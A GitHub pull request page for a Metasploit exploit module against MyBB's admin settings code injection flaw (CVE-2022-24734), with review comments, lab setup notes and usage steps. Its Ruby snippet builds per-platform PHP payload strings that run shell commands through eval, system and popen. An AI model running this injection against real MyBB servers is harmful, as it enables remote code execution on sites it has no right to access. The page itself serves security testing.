-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
MyBB Admin Control Code Injection RCE (CVE-2022-24734) #16607
MyBB Admin Control Code Injection RCE (CVE-2022-24734) #16607
Conversation
case target['Platform'] | ||
when 'php' | ||
cmd = cmd.gsub(/"/, '"' => '\\"') | ||
cmd = cmd.gsub(/\$/, '$' => '\\$') | ||
extra = "\" . eval(\"#{cmd}\") .\"" | ||
when 'win' | ||
cmd = cmd.gsub(/'/, "'" => "\\'") | ||
if target['Arch'] == ARCH_CMD | ||
# Force cmd to run in the background (only works for `cmd`) | ||
extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\"" | ||
else | ||
extra = "\" . system('#{cmd}') .\"" | ||
end | ||
else | ||
cmd = cmd.gsub(/'/, "'" => "\\'") | ||
extra = "\" . system('#{cmd} > /dev/null &') .\"" | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This feels like a PHP
utility function for staging a commands via PHP.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Especially because you might want to add alternatives if system
and popen
are blocked :)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, I agree, it is certainly a good start for such helper. However, it is very specific to how the PHP code is being injected. Here, the injection occurs in an eval()
, as a simple concatenation to a string.
case target['Platform'] | ||
when 'php' | ||
cmd = cmd.gsub(/"/, '"' => '\\"') | ||
cmd = cmd.gsub(/\$/, '$' => '\\$') | ||
extra = "\" . eval(\"#{cmd}\") .\"" | ||
when 'win' | ||
cmd = cmd.gsub(/'/, "'" => "\\'") | ||
if target['Arch'] == ARCH_CMD | ||
# Force cmd to run in the background (only works for `cmd`) | ||
extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\"" | ||
else | ||
extra = "\" . system('#{cmd}') .\"" | ||
end | ||
else | ||
cmd = cmd.gsub(/'/, "'" => "\\'") | ||
extra = "\" . system('#{cmd} > /dev/null &') .\"" | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Especially because you might want to add alternatives if system
and popen
are blocked :)
Thanks for the review @smcintyre-r7, @jmartin-r7, @jvoisin and @jheysel-r7. I pushed some updates to address your feedback. @jvoisin, in relation to this comment: that would be interesting to provide alternatives to |
Moving it to a mixing would make sense, since this is kinda off-topic in this module I think. |
Thanks @cdelafuente-r7 for the great module! Code looks great and testing provided the expected output on both linux and windows installs: Linux (target 0 - PHP)
Linux (target 1 - Unix (In-Memory))
Linux (target 2 - linux (Dropper))
Windows (target 0 - PHP)
Windows (target 3 - PowerShell (In-Memory))
Windows (target 4 - Windows (In-Memory))
|
Release NotesAdds an exploit module that leverages an improper input validation vulnerability in MyBB prior to |
This exploit module leverages an improper input validation vulnerability in MyBB prior to
1.8.30
to execute arbitrary code in the context of the user running the application.MyBB Admin Control setting page calls PHP
eval
function with an unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting.Note that authentication is required for this exploit to work and the account must have rights to add or update settings (typically, myBB administrator role).
Installation Steps
Linux with Docker
docket-compose.yml
file (see this):nginx/default.conf
docker-compose up
.http://127.0.0.1:8080/install
and finish the installation process.Windows with Nginx, PHP and MySQL
C:\php
C:\nginx
C:\nginx\nginx.conf
Verification Steps
use exploit/multi/http/mybb_rce_cve_2022_24734
run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>
Options
USERNAME
The username of a privileged MyBB account. It must have rights to add or update setting (usually with the administrator role)
PASSWORD
The password of the MyBB account.
Scenarios
Windows (target 0 - PHP)
Linux (target 0 - PHP)
Linux (target 1 - Unix (In-Memory))
Linux (target 2 - linux (Dropper))
Windows (target 3 - PowerShell (In-Memory))
Windows (target 4 - Windows (In-Memory))
Windows (target 5 - Windows (Dropper))